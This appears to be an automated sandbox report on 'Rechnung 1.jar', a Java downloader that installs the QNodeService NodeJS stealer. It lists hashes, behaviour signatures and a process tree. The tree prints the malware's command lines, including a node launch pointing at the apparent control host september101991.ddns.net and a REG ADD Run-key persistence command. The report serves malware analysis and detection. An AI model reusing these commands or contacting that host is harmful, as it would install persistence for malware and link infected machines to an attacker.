Rechnung 1.jar

General
Target

Rechnung 1.jar

Filesize

50KB

Completed

24-11-2020 19:30

Score
10/10
MD5

5847b21081ad895a7af96259f5ec0d59

SHA1

a690cb52bbb216fa181d700df67181c90c31d014

SHA256

bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1

Malware Config
Signatures 8

Filter: none

Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    4000node.exe
    1020node.exe
    504node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\75b8ffbb-a237-46bf-95d5-27d50d438190 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001aba0-163.datjs
    behavioral2/files/0x000100000001aba0-166.datjs
    behavioral2/files/0x000100000001aba0-170.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    21wtfismyip.com
    22wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    4000node.exe
    4000node.exe
    4000node.exe
    4000node.exe
    1020node.exe
    1020node.exe
    1020node.exe
    1020node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
    504node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 636 wrote to memory of 2220636java.exejavaw.exe
    PID 636 wrote to memory of 2220636java.exejavaw.exe
    PID 2220 wrote to memory of 40002220javaw.exenode.exe
    PID 2220 wrote to memory of 40002220javaw.exenode.exe
    PID 4000 wrote to memory of 10204000node.exenode.exe
    PID 4000 wrote to memory of 10204000node.exenode.exe
    PID 1020 wrote to memory of 5041020node.exenode.exe
    PID 1020 wrote to memory of 5041020node.exenode.exe
    PID 504 wrote to memory of 4060504node.execmd.exe
    PID 504 wrote to memory of 4060504node.execmd.exe
    PID 4060 wrote to memory of 40204060cmd.exereg.exe
    PID 4060 wrote to memory of 40204060cmd.exereg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"
    Suspicious use of WriteProcessMemory
    PID:636
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp
      Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:1020
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:504
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:4060
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4020
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp

                      MD5

                      5847b21081ad895a7af96259f5ec0d59

                      SHA1

                      a690cb52bbb216fa181d700df67181c90c31d014

                      SHA256

                      bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1

                      SHA512

                      cb844a4b2e976bad6d44c316b9718a2f795b00b91690cfd340ad4e7782eca279f58ff74cc79bc63d9d79e5aa8f232c2fc3e5cdb8b71f8d7a8f125e501d80224f

                    • C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js

                      MD5

                      3859487feb5152e9d1afc4f8cd320608

                      SHA1

                      7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                      SHA256

                      8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                      SHA512

                      826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • memory/504-169-0x0000000000000000-mapping.dmp

                    • memory/504-171-0x00000243A6680000-0x00000243A6681000-memory.dmp

                    • memory/1020-165-0x0000000000000000-mapping.dmp

                    • memory/1020-167-0x0000032CC8B80000-0x0000032CC8B81000-memory.dmp

                    • memory/2220-52-0x0000000000000000-mapping.dmp

                    • memory/4000-164-0x000003F791540000-0x000003F791541000-memory.dmp

                    • memory/4000-162-0x0000000000000000-mapping.dmp

                    • memory/4020-173-0x0000000000000000-mapping.dmp

                    • memory/4060-172-0x0000000000000000-mapping.dmp